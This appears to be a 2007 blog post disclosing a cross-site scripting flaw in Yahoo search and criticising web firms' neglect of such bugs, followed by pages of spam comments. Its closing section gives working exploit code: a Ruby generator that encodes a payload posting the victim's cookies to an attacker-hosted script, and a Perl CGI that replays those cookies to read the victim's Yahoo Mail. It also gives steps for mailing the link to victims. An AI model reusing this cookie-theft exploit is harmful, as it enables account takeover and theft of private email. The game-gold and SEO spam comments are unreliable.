Thursday, June 14, 2007

Yahoo defect endangers users -- do web sites care?

Summary:
  • Critical cross-site scripting (XSS) defect in Yahoo services is discovered
  • Proof of concept of exploit is included
  • XSS bugs are on the rise because of web 2.0+
  • The web industry is mostly negligent about dealing with XSS

XSS Defects


"I used to act dumb. That act is no longer cute." This is what the re-jailed Paris Hilton said to Barbara Walters from behind penis-painted bars last Sunday. And with these words, Paris demonstrated that she is smarter and has more class than the web sites you have come to rely on every day. This doesn'’t say much about Paris, but it says a hell of a lot about the billion-dollar companies that safeguard your data and identity.

Who else should be putting an end to the dumb act? How about Yahoo, the number one provider of email in the universe, with over 250 million users worldwide?

Every day, hundreds of defects known as "cross-site scripting," or XSS for short, are discovered on web sites every day. (This is not even counting all those that don’t get disclosed.) And the peanut butter eating yahoos in Yahoo’s development organization are not immune to coding up such so-called XSS bugs.

"Cross-site scripting" is the top security risk facing the web today. The biggest danger is that so few web sites actually care enough to guard against it; and those that do care like the big internet companies, e.g. Yahoo, Google, AOL, often make mistakes. And a single mistake can be devastating to vast numbers of users.

XSS Demonstration at Yahoo! Mail

Allow me to demonstrate how dangerous XSS can be. Let’s imagine you’re checking your Yahoo Mail and you see an interesting email, maybe one from a friend of yours or one that peddles medication for the enlargement of your ears. Inside the email is contained an innocuous-looking link that looks like a Yahoo search page, something like http://search.yahoo.com/web/advanced?ei=UTF-8&p=%22%3E.... You click on it... Now why the hell did you do that? You are now screwed.

That’s right: an attacker would now have complete access to your Yahoo account. All because you clicked on one link.

This is not fantasy. The simple code to take over anyone's Yahoo account is included at the bottom fo this article. If you were to visit this naughty link, your web browser would show the last email in your inbox displayed on a web site that is not part of Yahoo. What the simple link does is allow a program to navigate through your email account pretending to be you and download emails onto the attacker’s web site, allowing them to read all your conversations with iheartsanjaya3 you met on myspace.

But that’s not all that could happen. The attacking program could obtain your entire address-book, supplementing spammers'’ lucrative database of spam victims. And thanks to Yahoo’s recent integration of instant messaging within its web-mail site, it could also send instant messages to your friends impersonating you. ("You wanna do what to me?!") Many of your online accounts would then become vulnerable as well, since the attacker would have access to your password-resetting emails; this potentially means access to your financial accounts. All other Yahoo services that you use are also at risk, including Yahoo Photos or Flickr.

Worst of all, the simple act of clicking that link could allow an attacker to automatically send emails or instant messages as you to all your contacts containing the very same link, thus rapidly spreading the attack through your social network in a devastating epidemic known in the industry as a "worm." Within hours, millions of users’ accounts could be compromised.

Web Developer Ignorance and Web Company Complacency

Given how painful a "cross-site scripting" attack can be, its acronym should have been "ASS" instead of "XSS". Yet the developers behind the web applications you use every day often do not know what they are or do not care.

Why don’t web sites care enough? Because on the surface these vulnerabilities do not jeopardize the security of the entire company and such hacks are not as glamorous as high-profile break-ins where millions of social security numbers are stolen. But in reality, an XSS defect can be just as devastating to a site’s user base and extremely traumatic to any single user whose identity and privacy are violated.

Web developers are not keeping up with the increasing risks. While awareness of the risks of XSS and other dangers such as "Cross-Site Request Forgery" (CSRF) is on the rise, there are still many key developers who have never heard of these errors. Blame lack of developer training. The fact is that no developer should be allowed to touch code for a web site without undergoing a thorough education in protecting users from XSS. But the current situation is that web companies assume that their developers are "smart" enough to guard against it. The reality is that this is not a question of smarts, but a question of education and code review process, which are lacking on the web today.

There are a number of disturbing trends that are making the problem worse. The first is the constant push for the integration of many web services behind a single login. Because web conglomerates such as Yahoo and Google offer so many services under one roof, the chance that at any given time someone has left unlocked any of hundreds of doors has reached unacceptable levels. The online privacy and security of users hang precariously on a deck of cards.

The second exacerbating trend is the world of "user-generated content" (UGC). In today’s web 2.0, users are often allowed to generate content for a web site that other users will see. It’s now very easy for hackers to find ways to implant malicious exploits in the pages of innocent viewers.

Yet another trend is that applications are moving from the desktop to the web, as exemplified by Google Docs & Spreadsheets.

Next steps

Will the situation improve? It's up to the web companies to train their web developers and to institute processes to make sure that web application vulnerabilities like XSS and CSRF don't endanger their users.

As for users, your online privacy and security are always at risk. At any given moment, you can lose both, through no fault of yours.


Exploit Code


An attack is frighteningly easy to carry out.


  1. You find a hosting company to run your perl CGI script
  2. You install the code listed below on your web site
  3. You take the address that points to that CGI script and run it through the Ruby script included below in order to generate a link to Yahoo's XSS vulnerability
  4. You send out emails with that link to your best friend, or everyone on Yahoo if you're a loser and have no friends
Note: if you happen to be able to host this script and want to show everyone the proof of concept in action, please post a comment to this article with your generated link to the Yahoo XSS exploit.


Code to be hosted:


#!/usr/bin/perl

use CGI;
use CGI::Carp qw(fatalsToBrowser);
use URI::Escape;
use HTTP::Cookies;
use HTML::Entities;
use LWP::UserAgent;

$q = new CGI;

print "Content-type: text/html\n\n";

$cookies = uri_unescape($q->param('x'));
@cookies = split(/; /, $cookies);

$cj = HTTP::Cookies->new;

foreach $c (@cookies) {
$c =~ /^([^=]+)=(.*)$/;
$k = $1; $v = $2;
$cj->set_cookie('', $k, $v, "/", "yahoo.com");
}

$ua = LWP::UserAgent->new;
$ua->cookie_jar($cj);
$ua->agent('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4');

$r = $ua->simple_request(HTTP::Request->new(GET => "http://mail.yahoo.com/"));
$r->header('Location') =~ /https?:\/\/([^\/]+)/;
$host = $1;

$r = $ua->get("http://$host/ym/ShowFolder?rb=Inbox");
if (!($r->content =~ /<a[^>]+id="folderviewmsg0subjlink"[^>]+href="([^"]+)/is)) {
$url = "http://$host/ws/mail/v1/formrpc?m=ListMessages&appid=YahooMailRC&fid=Inbox&transform-markup=remove-javascript&startMid=0&numMid=300&startInfo=0&numInfo=30&sortKey=date&sortOrder=down";
$r = $ua->get($url);
$r->content =~ /<url>\s*([^>]+)\s*/si;

$r = $ua->get(decode_entities($1));
$r->content =~ /<mid>(.+?)<\/mid>/si;
$mid = $1;
$url = "http://$host/ws/mail/v1/formrpc?m=GetMessage&appid=YahooMailRC&fid=Inbox&message(0)-mid=$mid&message(0)-enableWarnings=true&message(0)-expandCIDReferences=true&message(0)-blockImages=all&truncateAt=1024000&transform-markup=remove-javascript&wssid=yr7G07oSPsarq&amp;r=0.655461233731633";
$r = $ua->get($url);
if ($r->content =~ /<url>\s*([^<]+)\s*/si)
{
$r = $ua->get(decode_entities($1));
}
if ($r->content =~ /<part[^>]+subtype="html"[^<]+<text>(.+?)<\/text/si) {
print decode_entities($1);
} elsif ($r->content =~ /<part[^>]+type="text"[^<]+<text>(.+?)<\/text/si) {
print decode_entities($1);
}
} else {
$r = $ua->get("http://$host$1&PRINT=1");
$r->content =~ /(<div id="message.+?<\/div>)\s*<script>/si;
print $1;
}


Code to generate Yahoo XSS exploit link:


#!/usr/bin/ruby

PATH_TO_CGI_SCRIPT = 'http://yourhostingsite.com/scriptname.cgi'

x = %Q{
f=document.forms[0];f.method='POST';f.action='#{PATH_TO_CGI_SCRIPT}';f.x.value=document.cookie;f.submit()
}

s = %q{http://search.yahoo.com/web/advanced?ei=UTF-8&p=%22%3E%3Cimg%20src=14%20onerror=eval(String.fromCharCode(}
s += x.strip.split(//).map{|s|s[0]}.join(",")
s += %q{))%3E&y=Search&fr=yfp-t-501}

puts s


- Rarely Greys <rarely.greys at (Google's mail)>

ed78040f0e776700f79d918e5be76a0d0b932ec48a1b2c823577b88a9dcf446ee09003a4154e8d9a0d89b3630396136e3100235388c1c7dc51226e4692b2cbfc

417 comments:

«Oldest   ‹Older   401 – 417 of 417
いてち said...

SEO まだわかりません。 着サイト情報は SEO対策で サイトの問題点を比較・分析、効果的なSEO対策を行って、またはseoツールにご利用下さい、このサイト検索エンジンの地位があります。

いてち said...

CrazyTalk
CloneDVD
初音ミク
矯正歯科
ハワイアンジュエリー
似顔絵ウェルカムボード
経営雑誌
経済雑誌
桜の季節
素敵な音楽
海辺
幸福の路
風景

dhdh said...

コンタクトレンズ幼児教室個別指導塾システム開発合宿 免許債務整理名刺遺品整理ハワイアンジュエリージュエリーフランチャイズ矯正歯科

dhdh said...

SEO まだわかりません。 着サイト情報は SEO対策で サイトの問題点を比較・分析、効果的なSEO対策を行って、またはseoツールにご利用下さい、このサイト検索エンジンの地位があります。

sun said...

探偵
腰痛
ジュエリー
募金
多重債務
個別指導塾
国内格安航空券
葬儀 千葉
会社設立
名刺作成
矯正歯科
経済雑誌

フランチャイズ
有料老人ホーム
ブログアフィリエイト
ハワイアンジュエリー
似顔絵ウェルカムボード
ショッピング枠 現金化
クレジットカード 現金化
クレジットカード 現金化
青島 温泉
格安航空券
合宿 免許
会社設立
グループウェア
コンタクトレンズ
不動産投資
名刺作成
価格

不動産
格安 名刺

lanzi said...

I can get Megaten Gold cheaply.
Yesterday i bought Megaten online Gold for my brother.
i hope him like it. i will give Megaten money to him
as birthday present. i like the cheap Megaten Gold very much.
I usuallybuy Megaten Gold and keep it in my store.
I enjoy the Megaten online money.
I can get Solstice Kron cheaply.
Yesterday i bought Solstice Online Kronfor my brother.
i hope him like it. i will give Solstice Gold to him
as birthday present. i like the Solstice Online money very much.
I usually buy cheap Solstice Kron and keep it in my store.

qwe said...

wonderland Gold is my object when I play this new and beautiful Wonderland Online Game. I found that some place need to pay for wonderland online Gold, and this place is full of attractions. You can go to buy wonderland Gold to take your tent with you when you are traveling around the WL world. I like her bright mind, so that we can make more wonderland money with her bright mind. Invite your friends with cheap wonderland online Gold to relax for a minute of peace and quiet after a long quest.
shaiya gold is the important one in the Shaiya Game, when I begin to come into contact with the wonderful Online Game. Every one also likes playing this Shaiya game with some shaiya online gold. Although the game is free to play, we have to cost some shaiya money to buy our favorite equipment. Their primary goal of cheap shaiya gold is not damage infliction, but rather keeping foes away from other party members. So I have decided to buy shaiya gold to try playing this game first.

yanhui said...

Once I played GuildWars, I did not know how to get strong, someone told me that you must have gw gold. He gave me some GuildWars Gold, he said that I could buy Guild Wars Gold, but I did not have money, then I played it all my spare time. From then on, I got some GuildWars money, if I did not continue to play it, I can sell cheap gw gold to anyone who want.
Once I played habbo, I did not know how to get strong, someone told me that you must have habbo credits. He gave me some habbo gold, he said that I could buy habbo gold, but I did not have money, then I played it all my spare time. From then on, I got some habbo coins, if I did not continue to play it, I can sell cheap habbo credits to anyone who want.

筱娅 said...

Have you heared about a game which you need use Entropiauniverse ped to play, and you can also borrow Entropia Universe Gold from other players? But you can Buy Entropia Universe Gold, or you will lose the choice if you do not have Entropia Universe Money. If you get cheap Entropiauniverse ped, you can continue this game.
Have you heared about a game which you need use kal geons to play, and you can also borrow kal gold from other players? But you can buy kal online geons, or you will lose the choice if you do not have kal online gold. If you get kalonline Geons, you can continue this game.

陈凯燕 said...

Do you know 2moons dil? I like it.
My brother often goes to the internet bar to buy 2moons gold and play it.
After school, He likes playing games using these 2moon dil with his friend.
I do not like to play it. Because I think that it not only costs much money but also spend much time. One day, he give me many buy 2moons dil and play the game with me.
I came to the bar following him and found cheap 2moons gold was so cheap. After that, I also go to play game with him.

Do you know Asda Story gold? I like it.
My brother often goes to the internet bar to buy Asda Story money and play it.
After school, He likes playing games using these buy Asda Story Gold with his friend.
I do not like to play it. Because I think that it not only costs much money but also spend much time. One day, he give me manycheap Asda Story gold and play the game with me.

cheng said...

Do you want to know the magic of online games, and here you can get more knight gold. Do you want to have a try? Come on and knight noah can make you happy. You can change a lot knight online gold for play games. And you can practice your game skill. Playing online games can knight online noah. I often come here and buy it. And you can use the cheap knight gold do what you want to do in the online game.

What do you know requiem gold. And do you want to know? You can get requiem lant here. And welcome to our website, here you can play games, and you will get requiem money to play game. I know cheap requiem lant, and it is very interesting. Do you want a try, come and view our website, and you will learn much about requiem online gold.

said...

You know ,I have some priston tale Gold, and my friend also has some
priston tale Money, do you kouw they have the same meaning,I just want to
buy priston tale Gold, because there are many
cheap priston tale Gold.
You know ,I have some shadow of legend Gold, and my friend also has some
sol gold, do you kouw they have the same meaning,Both of them can be called
shadow of legend money,I just want to
buy shadow of legend Gold, because there are many
cheap shadow of legend Gold.

fangyan said...

As a new player , you may need some game guides or information to enhance yourself.
World of Kung fu Gold is one of the hardest theme for every class at the beginning . You must have a good way to manage your WoKf gold.If yor are a lucky guy ,you can earn so many buy World of Kung fu Gold by yourself . But if you are a not , I just find a nice way to cheap World of Kung fu Gold. If you need , you can buy World of Kung fu money at our website . Go to the related page and check the detailed information . Once you have any question , you can connect our customer service at any time .


Making aoc gold is the old question : Honestly there is no fast way to make lots of conan gold . Sadly enough a lot of the people that all of a sudden come to with millions of age of conan gold almost overnight probably duped . Although there are a lot of ways to make lots of cheap aoc gold here I will tell you all of the ways that I know and what I do to buy aoc money.

game gold said...

After separate for one year, I can not leave you, leave Scions Of Fate gold . Now I buy SOF gold again, I do not want to leave you, but at that time, I have no idea. Buy Scions Of Fate money is the thing I want to do for long time. I know that cheap SOF gold is your life. So I will try my best and do not let you pass away. In my mind, I think I buy sof gold is the fate.

Without hesitate, I bought second life linden , in the game I can find myself. I feel lonely, but I do not want to talk with anyone, so I buy lindens . At present, think the happy day I spend in knight, I am eager to enter it, and buy cheap linden . Own linden dollars , it means that you own the life of happiness. So I will not leave secondlife money . It is the origin of the happiness.

梦中林 said...

A slim, wide-eyed mygamegoldwoman almost human in virbanksfeatures eyed agamegold the pair. Her nose was sharp, but very elegant. She had tbcgold a pale, trade4gamebeautiful face the color of ivory, and veryge for hair she wore a wondrous mane of downy feathers. Her gown fluttered as she walked—on two delicate worldofgolds but still sharply-taloned feet. “Awake, awake you are,” she said with a pvp365 slight frown. “You should rest, rest.” Krasus bowed to her. “I am ezmmorpg grateful for your ighey hospitality, mistress, but I am well enough to continue on9a9z now.” She cocked her head as a bird might, giving the mageltk365 a reproving look. “No, no…too soon, toogold4guild soon. Please, sit.” The duo looked around u4game and discovered that two chairs, made in the same ready4game fashion as the nest, waited behind happygolds them. Malfurion waited for Krasus, who finally nodded and sat.

梦中林 said...

A slim, wide-eyed mygamegoldwoman almost human in virbanksfeatures eyed agamegold the pair. Her nose was sharp, but very elegant. She had tbcgold a pale, trade4gamebeautiful face the color of ivory, and veryge for hair she wore a wondrous mane of downy feathers. Her gown fluttered as she walked—on two delicate worldofgolds but still sharply-taloned feet. “Awake, awake you are,” she said with a pvp365 slight frown. “You should rest, rest.” Krasus bowed to her. “I am ezmmorpg grateful for your ighey hospitality, mistress, but I am well enough to continue on9a9z now.” She cocked her head as a bird might, giving the mageltk365 a reproving look. “No, no…too soon, toogold4guild soon. Please, sit.” The duo looked around u4game and discovered that two chairs, made in the same ready4game fashion as the nest, waited behind happygolds them. Malfurion waited for Krasus, who finally nodded and sat.

rhtehe said...

Do you know the fiesta Gold, in the game you need the
fiesta money. it can help you increase your level. My friends always asked me how to
buy fiesta Gold, and I do not know he spend how much money to buy the
fiesta online gold, when I see him in order to play the game and search which the place can buy the
fiesta online money. I am happy with him.
Do you know the tcos Gold, in the game you need the
chronicles of spellborn gold. it can help you increase your level. My friends always asked me how to buy the chronicles of spellborn Gold, and I do not know he spend how much money to buy the
tcos money, when I see him in order to play the game and search which the place can buy the
chronicles of spellborn money. I am happy with him.

«Oldest ‹Older   401 – 417 of 417   Newer› Newest»